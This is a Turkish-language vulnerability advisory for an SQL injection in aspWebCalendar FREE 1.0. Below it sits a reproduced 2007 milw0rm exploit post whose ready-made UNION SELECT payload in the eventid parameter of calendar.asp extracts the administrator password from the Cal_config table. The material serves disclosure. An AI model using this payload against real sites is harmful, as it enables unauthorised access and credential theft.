aspWebCalendar FREE "eventid" SQL Injection açığı

parad0x tarafından rapor edilen güvenlik açığı SQL sorgularında değişiklik yapılabilmesine izin veriyor.

calendar.asp dosyasındaki eventid parametresine gönderilen girişler, eğer action viewevent olarak set edilmişse, SQL sorgularında kullanılmadan önce doğru olarak filtrelenmiyor. Bu sayede SQL sorgularında değişiklik yaparak SQL kodları çalıştırmak mümkün olabiliyor. Örnek olarak bu açıktan yararlanarak administrator şifresi ele geçirilebiliyor.

Açığın 1.0 sürümünde olduğu rapor edildi fakat diğer sürümler de etkileniyor olabilir.

Kaynak: http://secunia.com/advisories/24622/
Ref: http://milw0rm.com/exploits/3546
Ref2: http://secunia.com/advisories/12651/

*******************************************************************************
# Title : aspWebCalendar Remote SQL Injection Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptdungeon.com/script.php?ScriptID=4306
# $$ : free
#S.Page : http://fullrevolution.com
*******************************************************************************
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]

Example:

/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config

"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron

"""""""""""""""""""""
www.p4r4d0x.com

# milw0rm.com [2007-03-22]